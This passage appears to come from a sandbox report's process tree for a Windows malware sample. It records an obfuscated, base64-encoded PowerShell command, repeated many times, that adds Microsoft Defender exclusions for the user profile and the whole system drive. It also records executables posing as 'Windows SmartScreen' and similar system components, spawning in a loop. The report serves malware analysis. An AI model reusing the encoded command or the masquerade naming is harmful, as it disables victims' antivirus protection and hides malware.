"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
72⤵
- Command and Scripting Interpreter: PowerShell
PID:6960

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
72⤵
PID:7428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
73⤵
- Command and Scripting Interpreter: PowerShell
PID:6304

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
73⤵
PID:7820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
74⤵
PID:7736

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
74⤵
PID:4892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
75⤵
- Command and Scripting Interpreter: PowerShell
PID:5536

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
75⤵
PID:6784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
76⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
76⤵
PID:6476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
77⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
77⤵
PID:4716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
78⤵
- Command and Scripting Interpreter: PowerShell
PID:8012

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
78⤵
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
79⤵
PID:7444

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
79⤵
PID:568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
80⤵
- Command and Scripting Interpreter: PowerShell
PID:1468

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
80⤵
PID:780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
81⤵
- Command and Scripting Interpreter: PowerShell
PID:3124

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
81⤵
PID:7488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
82⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
82⤵
PID:6384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
83⤵
- Command and Scripting Interpreter: PowerShell
PID:3316

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
83⤵
PID:8172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
84⤵
- Command and Scripting Interpreter: PowerShell
PID:7224

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
84⤵
PID:4472

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
83⤵
PID:7536

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
83⤵
PID:1864

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
83⤵
PID:2364

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
84⤵
PID:6540

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
82⤵
PID:5288

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
82⤵
PID:6812

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
82⤵
PID:7780

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
83⤵
PID:5156

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
81⤵
PID:7400

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
81⤵
PID:7660

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
81⤵
PID:6428

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
82⤵
PID:6776

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
80⤵
PID:6588

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
80⤵
PID:6484

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
80⤵
PID:5868

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
81⤵
PID:5164

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
79⤵
PID:5436

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
79⤵
PID:7708

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
79⤵
PID:3452

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
80⤵
PID:8060

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
78⤵
PID:5352

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
78⤵
PID:7272

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
78⤵
PID:6600

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
79⤵
PID:4004

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
77⤵
PID:7676

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
77⤵
PID:5872

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
77⤵
PID:3728

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
78⤵
PID:4020

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
76⤵
PID:1400

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
76⤵
PID:7404

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
76⤵
PID:7412

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
77⤵
PID:2912

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
75⤵
PID:6176

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
75⤵
PID:3200

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
75⤵
PID:6516

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
76⤵
PID:7808

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
74⤵
PID:6180

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
74⤵
PID:6724

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
74⤵
PID:8164

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
75⤵
PID:948

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
73⤵
PID:7548

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
73⤵
PID:8028

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
73⤵
PID:4760

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
74⤵
PID:5444

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
72⤵
PID:2600

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
72⤵
PID:8156

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
72⤵
PID:8112

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
73⤵
PID:2244

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
71⤵
PID:7528

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
71⤵
PID:7220

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
71⤵
PID:5468

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
72⤵
PID:8164

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
70⤵
PID:5300

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
70⤵
PID:1020

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
70⤵
PID:7440

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
71⤵
PID:948

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
69⤵
PID:7188

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
69⤵
PID:7268

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
69⤵
PID:7052

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
70⤵
PID:4672

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
68⤵
PID:6652

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
68⤵
PID:7640

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
68⤵
PID:1840

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
69⤵
PID:8028

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
67⤵
PID:7488

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
67⤵
PID:7740

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
67⤵
PID:7416

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
68⤵
PID:5056

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
66⤵
PID:6640

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
66⤵
PID:2860

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
66⤵
PID:3316

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
67⤵
PID:7848

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
65⤵
PID:1552

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
65⤵
PID:6220

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
65⤵
PID:3384

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
66⤵
PID:7776

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
64⤵
PID:5352

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
64⤵
PID:7784

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
64⤵
PID:7644

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
65⤵
PID:7668

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
63⤵
PID:6960

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
63⤵
PID:7900

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
63⤵
PID:1504

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
64⤵
PID:5108

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
62⤵
PID:2332

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
62⤵
PID:5192

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
62⤵
PID:4872

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
63⤵
PID:6236

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
61⤵
PID:3480

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
61⤵
PID:7708

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
61⤵
PID:2028

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
62⤵
PID:132

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
60⤵
PID:3420

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
60⤵
PID:6200

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
60⤵
PID:4052

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
61⤵
PID:8036

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
59⤵
PID:1572

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
59⤵
PID:7820

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
59⤵
PID:6892

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
60⤵
PID:7656

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
58⤵
PID:7468

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
58⤵
PID:5916

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
58⤵
PID:3508

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
59⤵
PID:3920

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
57⤵
PID:6228

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
57⤵
PID:6700

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
57⤵
PID:4932

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
58⤵
PID:7576

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
56⤵
PID:6308

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
56⤵
PID:7728

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
56⤵
PID:3392

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
57⤵
PID:7620

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
55⤵
PID:2840

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
55⤵
PID:8000

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
55⤵
PID:6636

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
56⤵
PID:4196

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
54⤵
PID:6360

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
54⤵
PID:5620

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
54⤵
PID:6200

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
55⤵
PID:7336

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
53⤵
PID:3144

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
53⤵
PID:1484

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
53⤵
PID:8104

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
54⤵
PID:6628

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
52⤵
PID:7196

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
52⤵
PID:5368

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
52⤵
PID:4328

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
53⤵
PID:7492

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
51⤵
PID:7888

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
51⤵
PID:4688

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
51⤵
PID:828

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
52⤵
PID:5896

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
50⤵
PID:7524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7524 -s 1256
51⤵
PID:72

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
50⤵
PID:7916

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
50⤵
PID:7956

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
51⤵
PID:2312

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
49⤵
PID:4104

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
49⤵
PID:2248

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
49⤵
PID:5368

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
50⤵
PID:7252

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
48⤵
PID:1620

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
48⤵
PID:4916

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
48⤵
PID:5044

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
49⤵
PID:5448

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
47⤵
PID:6016

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
47⤵
PID:6968

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
47⤵
PID:4872

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
48⤵
PID:1700

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
46⤵
PID:4460

C:\Users\Admin\Windows Service Wrapper.exe
"C:\Users\Admin\Windows Service Wrapper.exe"
46⤵
PID:5716

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
46⤵
PID:1924

C:\Users\Admin\Windows SmartScreen.exe
"C:\Users\Admin\Windows SmartScreen.exe"
47⤵
PID:2464

C:\Users\Admin\Windows Driver Foundation.exe
"C:\Users\Admin\Windows Driver Foundation.exe"
45⤵
PID:1828

C:\Users\Admin\Windows Service Wrapper.exe
